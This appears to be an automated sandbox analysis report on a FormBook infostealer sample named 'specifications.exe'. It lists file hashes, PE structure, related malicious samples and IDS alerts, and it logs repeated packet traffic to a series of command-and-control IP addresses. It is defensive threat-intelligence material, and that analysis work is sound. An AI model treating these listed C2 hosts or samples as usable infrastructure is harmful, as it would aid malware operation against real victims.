                                                                                                                                                                                • 217.160.0.158
                                                                                                                                                                                IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 217.160.0.200
                                                                                                                                                                                7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 82.165.72.122
                                                                                                                                                                                CNSERVERSUSPO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                                                                                                • 23.225.34.75
                                                                                                                                                                                Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                • 154.88.22.104
                                                                                                                                                                                nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 162.209.130.216
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 154.88.22.101
                                                                                                                                                                                pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 45.43.9.206
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 154.88.22.101
                                                                                                                                                                                arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 172.247.21.10
                                                                                                                                                                                piR516SetM.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 154.90.62.248
                                                                                                                                                                                XwUh11g4l4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 154.90.62.248
                                                                                                                                                                                REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 23.225.160.132
                                                                                                                                                                                CAFENETTGARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 154.70.82.246
                                                                                                                                                                                sora.x86-20240504-0115.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.190
                                                                                                                                                                                Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.172
                                                                                                                                                                                WeKOvoISwM.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.176
                                                                                                                                                                                F9eqjesWZR.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.143
                                                                                                                                                                                arm7-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.163
                                                                                                                                                                                o8bI79fBhK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.173
                                                                                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.140
                                                                                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.199
                                                                                                                                                                                dPJTQiCFxS.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 80.248.76.161
                                                                                                                                                                                No context
                                                                                                                                                                                No context
                                                                                                                                                                                Process:C:\Users\user\Desktop\specifications.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                Entropy (8bit):7.7651601110363675
                                                                                                                                                                                TrID:
                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                File name:specifications.exe
                                                                                                                                                                                File size:882'688 bytes
                                                                                                                                                                                MD5:8f233b98037a9f801c3977afe32776a6
                                                                                                                                                                                SHA1:f4f49244fc94081d79f2f16802441872fa509fb7
                                                                                                                                                                                SHA256:56074e8ad9bd7ee8b56c2bbd5c826c7bbcb1819dd0145c7a2733b8ce3d78938e
                                                                                                                                                                                SHA512:e2a7db0f019e4689264fe4654092bc1d46c5efbe99a4951008a70b3493e967d0a90b07c5cafab26589723015d43822671cab2d9133eb05b96f132cba3d8b9bdd
                                                                                                                                                                                SSDEEP:12288:aiXy5jNJEaGeoZcwzA4aqMdcTxyzHJNxGNiAnGLBMIU648lrOto1zGksv+SGjpAg:as400ojA9qjTxyzHzxu76ZB1zGUxj
                                                                                                                                                                                TLSH:3F15E0883610B59FC497C9718A68DDB8A6606CBB970BC303E1D72DEFB91D597DE001E2
                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&................0..H...........g... ........@.. ....................................@................................
                                                                                                                                                                                Icon Hash:323636b29699c72c
                                                                                                                                                                                Entrypoint:0x4d679e
                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                Time Stamp:0x91062694 [Wed Feb 6 20:56:52 2047 UTC]
                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                Instruction
                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd6750 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd8000 | 0x2a08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd47a4 | 0xd4800 | 1327b2f7f0008c0129bb7b92fbb70024 | False | 0.8931123621323529 | data | 7.769913343213509 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd8000 | 0x2a08 | 0x2c00 | d9b5d9e2ab2d11107a8823a55bbff8da | False | 0.8745561079545454 | data | 7.486085144809475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xdc000 | 0xc | 0x200 | 25d699c7bd98ecc3a8178b45a8111934 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd8130 | 0x244f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9797740720817644
RT_GROUP_ICON | 0xda580 | 0x14 | data | | | 1.05
RT_VERSION | 0xda594 | 0x288 | data | | | 0.46296296296296297
RT_MANIFEST | 0xda81c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-29T09:15:53.450775+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 23.225.159.42 | 80 | TCP
2024-11-29T09:16:11.372591+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 156.232.181.155 | 80 | TCP
2024-11-29T09:16:14.076000+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49770 | 156.232.181.155 | 80 | TCP
2024-11-29T09:16:16.857724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49775 | 156.232.181.155 | 80 | TCP
2024-11-29T09:16:19.613328+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49786 | 156.232.181.155 | 80 | TCP
2024-11-29T09:16:26.546324+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49802 | 185.27.134.206 | 80 | TCP
2024-11-29T09:16:29.258911+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49808 | 185.27.134.206 | 80 | TCP
2024-11-29T09:16:31.874002+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49814 | 185.27.134.206 | 80 | TCP
2024-11-29T09:16:34.787530+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49820 | 185.27.134.206 | 80 | TCP
2024-11-29T09:16:51.342534+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49860 | 104.21.90.137 | 80 | TCP
2024-11-29T09:16:54.018391+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49866 | 104.21.90.137 | 80 | TCP
2024-11-29T09:16:56.777531+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49872 | 104.21.90.137 | 80 | TCP
2024-11-29T09:16:59.487231+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49880 | 104.21.90.137 | 80 | TCP
2024-11-29T09:17:06.465787+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49896 | 209.74.77.107 | 80 | TCP
2024-11-29T09:17:09.251168+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49903 | 209.74.77.107 | 80 | TCP
2024-11-29T09:17:12.133236+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49911 | 209.74.77.107 | 80 | TCP
2024-11-29T09:17:14.845228+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49917 | 209.74.77.107 | 80 | TCP
2024-11-29T09:17:21.791971+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49933 | 176.32.38.130 | 80 | TCP
2024-11-29T09:17:24.445342+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49939 | 176.32.38.130 | 80 | TCP
2024-11-29T09:17:27.059744+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49947 | 176.32.38.130 | 80 | TCP
2024-11-29T09:17:29.731036+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49952 | 176.32.38.130 | 80 | TCP
2024-11-29T09:17:36.629843+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49966 | 161.97.168.245 | 80 | TCP
2024-11-29T09:17:39.272034+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49972 | 161.97.168.245 | 80 | TCP
2024-11-29T09:17:41.927368+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49977 | 161.97.168.245 | 80 | TCP
2024-11-29T09:17:44.585535+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49983 | 161.97.168.245 | 80 | TCP
2024-11-29T09:17:52.685236+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50002 | 103.75.185.22 | 80 | TCP
2024-11-29T09:17:55.341486+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50007 | 103.75.185.22 | 80 | TCP
2024-11-29T09:17:58.013935+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50012 | 103.75.185.22 | 80 | TCP
2024-11-29T09:18:00.879697+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50017 | 103.75.185.22 | 80 | TCP
2024-11-29T09:18:07.842523+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50018 | 155.94.253.4 | 80 | TCP
2024-11-29T09:18:10.558205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 155.94.253.4 | 80 | TCP
2024-11-29T09:18:13.133640+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 155.94.253.4 | 80 | TCP
2024-11-29T09:18:15.858592+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50021 | 155.94.253.4 | 80 | TCP
2024-11-29T09:18:22.885892+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 208.91.197.27 | 80 | TCP
                                                                                                                                                                                2024-11-29T09:18:25.453892+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:28.111233+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:31.437921+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450025208.91.197.2780TCP
                                                                                                                                                                                2024-11-29T09:18:38.930551+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:41.675299+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:44.336008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:47.005824+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450029217.160.0.20080TCP
                                                                                                                                                                                2024-11-29T09:18:55.030408+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:18:57.685346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:19:00.357354+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:19:03.384246+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450033154.70.82.24680TCP
                                                                                                                                                                                2024-11-29T09:19:10.465837+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034172.67.216.17380TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                Nov 29, 2024 09:16:55.581598043 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.581679106 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:55.600591898 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:55.720676899 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720706940 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720817089 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720860004 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720931053 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.720990896 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.721045971 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.721100092 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:55.721210003 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:56.776603937 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:56.777483940 CET8049872104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:56.777530909 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:57.107342005 CET4987280192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.125686884 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.245691061 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:58.245805025 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.256155968 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:58.376055956 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:59.486824989 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:59.486989021 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:16:59.487231016 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:59.495687962 CET4988080192.168.2.4104.21.90.137
                                                                                                                                                                                Nov 29, 2024 09:16:59.615638018 CET8049880104.21.90.137192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:05.121393919 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:05.241970062 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:05.242077112 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:05.337042093 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:05.457081079 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:06.465441942 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:06.465667963 CET8049896209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:06.465786934 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:06.841686010 CET4989680192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:07.904395103 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:08.024297953 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:08.024471998 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:08.059864044 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:08.179884911 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:09.250885963 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:09.251125097 CET8049903209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:09.251168013 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:09.607075930 CET4990380192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.667865992 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.787842035 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.787940979 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.858763933 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:10.978920937 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.978940010 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979043007 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979131937 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979140997 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979150057 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979202986 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979219913 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:10.979291916 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:12.133003950 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:12.133155107 CET8049911209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:12.133235931 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:12.372697115 CET4991180192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.457156897 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.577223063 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:13.577292919 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.600614071 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:13.720669985 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:14.845067978 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:14.845180988 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:14.845227957 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:14.848242044 CET4991780192.168.2.4209.74.77.107
                                                                                                                                                                                Nov 29, 2024 09:17:14.968106031 CET8049917209.74.77.107192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:20.294356108 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:20.414383888 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:20.414522886 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:20.429390907 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:20.549349070 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:21.789715052 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:21.789936066 CET8049933176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:21.791970968 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:21.935185909 CET4993380192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:22.954293013 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:23.074197054 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:23.074312925 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:23.088888884 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:23.208812952 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:24.445173979 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:24.445246935 CET8049939176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:24.445342064 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:24.591877937 CET4993980192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.610284090 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.731245995 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.733978987 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.751926899 CET4994780192.168.2.4176.32.38.130
                                                                                                                                                                                Nov 29, 2024 09:17:25.872107983 CET8049947176.32.38.130192.168.2.4
                                                                                                                                                                                Nov 29, 2024 09:17:25.872121096 CET8049947176.32.38.130192.168.2.4
